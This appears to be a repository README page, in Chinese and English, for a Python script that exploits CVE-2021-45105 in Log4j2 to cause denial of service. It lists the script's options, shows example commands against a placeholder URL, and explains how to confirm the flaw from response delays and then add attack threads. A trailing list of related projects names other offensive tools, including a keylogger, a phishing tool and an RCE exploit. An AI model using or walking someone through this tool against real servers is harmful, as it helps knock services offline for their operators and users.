log4j2 dos exploit,CVE-2021-45105 exploit,Denial of Service poc

Last update: Aug 13, 2022

Overview

说明 about

author: 我超怕的

blog: https://www.cnblogs.com/iAmSoScArEd/

github: https://github.com/iAmSOScArEd/

date: 2021-12-20

log4j2 dos exploit

log4j2 dos 漏洞利用脚本

CVE-2021-45105 Exploit

CVE-2021-45105 利用脚本

利用方式 how to use

English：

Log4j2_dos.py -u <url> -m <method> -d <params> -H <header> -l <loop> -t <thread>

-u,--url    	 attack target
-m,--method    http method, only get and post. default is get.
-d,--data   	 get or post params, json format like:{\"username\":\"\"}
-H,--header    request header, json format like:{\"user-agent\":\"\"}
-l,--loop    	 payload loop times (or length),default 100.it is determine where is the params, example get param max length or post param max length or request header max length
-t,--thread    attack thread. default is 0, just request once.

usage:
Log4j2_dos.py -u http://url.com/ -d {\"username\":\"\"}
Log4j2_dos.py -u http://url.com/ -d {\"username\":\"\"} -l 500 -t 100
Log4j2_dos.py -u http://url.com/ -m post -d {\"username\":\"\"} -l 500
Log4j2_dos.py -u http://url.com/ -m post -H {\"user-agent\":\"\"} -l 500 -t 100
Log4j2_dos.py -u http://url.com/ -m post -d {\"username\":\"\"} -H {\"user-agent\":\"\"} -l 500

Output format：

[+] normal time:0.11111

[+] attack time:2.00000

if attack time -normal time>1 or something，it maybe exist vulnerability，can use -t param set attack thread.

中文：

 Log4j2_dos.py -u <url> -m <method> -d <params> -H <header> -l <loop> -t <thread>
 
-u,--url   		 攻击目标
-m,--method    默认为get，http方式，仅支持get和post
-d,--data   	 get或post请求参数，json格式，如：{\"username\":\"\"}
-H,--header    请求头, json格式， 如：{\"user-agent\":\"\"}
-l,--loop    	 默认为100，payload循环长度,根据参数在不同的位置，设置不同的数值，如请求头最大允许长度、get最大长度、post最大长度
-t,--thread    默认为0,表示仅请求一次，攻击线程.。

输出格式：

[+] normal time:0.11111

[+] attack time:2.00000

如果attack time延迟很大，说明漏洞存在，可以利用-t参数设置攻击线程

免责声明

请勿用于非法用途，仅供学习参考。任何违法行为与本人无关。

蹩脚英语，没用翻译，将就看。

By：我超怕的

log4j2 dos exploit,CVE-2021-45105 exploit,Denial of Service poc

Related tags

Overview

说明 about

利用方式 how to use

English：

中文：

免责声明

Owner

Pgen is the best brute force password generator and it is improved from the cupp.py

Obfuscate your Python scripts better, faster.

We protect the privacy of the data on your computer by using the camera of your Debian based Pardus operating system. 🕵️

Malware-analysis-writeups - Some of my Malware Analysis writeups

Separation of Mainlobes and Sidelobes in the Ultrasound Image Based on the Spatial Covariance (MIST) and Aperture-Domain Spectrum of Received Signals

Virus-Builder - This tool will generate a virus that can only destroy Windows computer

An Advanced Local Network IP Scanner, made in python of course!

INFO 3350/6350, Spring 2022, Cornell

Python directory buster, multiple threads, gobuster-like CLI, web server brute-forcer, URL replace pattern feature.

Check for breached passwords with k-anonymity

一个自动挖掘漏洞的框架，日后会发展成强大的信息收集+漏洞挖掘脚本！

script that pulls cve collections from NVD.NIST.GOV.

Detection tool of malware(s) by checksum (useful for forensic)

LdapRelayScan - Check for LDAP protections regarding the relay of NTLM authentication

A proxy for asyncio.AbstractEventLoop for testing purposes

This is a keylogger in python for Windows, Mac and Linux!

Bandit is a tool designed to find common security issues in Python code.

WhPhisher: a Phishing tool With Python

SonicWall SMA-100 Unauth RCE Exploit (CVE-2021-20038)

#whois it? Let's find out!